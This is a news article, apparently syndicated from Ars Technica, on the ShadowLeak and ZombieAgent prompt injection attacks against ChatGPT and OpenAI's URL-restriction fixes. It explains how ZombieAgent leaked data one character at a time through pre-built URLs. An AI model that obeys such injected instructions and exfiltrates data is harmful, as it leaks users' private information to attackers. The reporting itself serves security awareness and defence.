Atrás

OpenAI Tightens ChatGPT URL Controls After Prompt Injection Attacks

OpenAI Tightens ChatGPT URL Controls After Prompt Injection Attacks
Ars Technica2

Background of the attacks

Researchers discovered a prompt‑injection technique called ShadowLeak that coaxed ChatGPT into constructing new URLs by adding query parameters or inserting user‑derived data. By doing so, the model could inadvertently exfiltrate information.

In response, OpenAI altered the system so that ChatGPT would only open URLs that match the exact string provided by the user, refusing to modify them even when explicitly instructed.

Radware's ZombieAgent variant

Radware demonstrated a follow‑up method named ZombieAgent. This approach supplied a list of pre‑constructed URLs, each consisting of a base address followed by a single letter or number (for example, "example.com/a" or "example.com/0"). The prompt also instructed the model to replace spaces with a special token. Because OpenAI’s initial fix did not block the addition of a single character to a base URL, the model could still access these URLs one character at a time, allowing data to be exfiltrated letter by letter.

OpenAI’s second mitigation

To counter ZombieAgent, OpenAI introduced a stricter rule: ChatGPT may not open any link originating from an email unless the link appears in a well‑known public index or is directly supplied by the user within the chat prompt. This prevents the model from automatically following base URLs that could be controlled by an attacker.

Ongoing challenges

Both incidents illustrate a recurring pattern in software security where a mitigation is quickly followed by a new workaround. Analysts compare this cycle to the persistence of SQL injection and memory‑corruption vulnerabilities, which continue to be exploited despite years of defensive measures.

Pascal Geenens, vice president of threat intelligence at Radware, emphasized that “guardrails should not be considered fundamental solutions for the prompt injection problems. Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”

Usado: News Factory APP - descubrimiento de noticias y automatización - ChatGPT para Empresas

Source: Ars Technica2

También disponible en: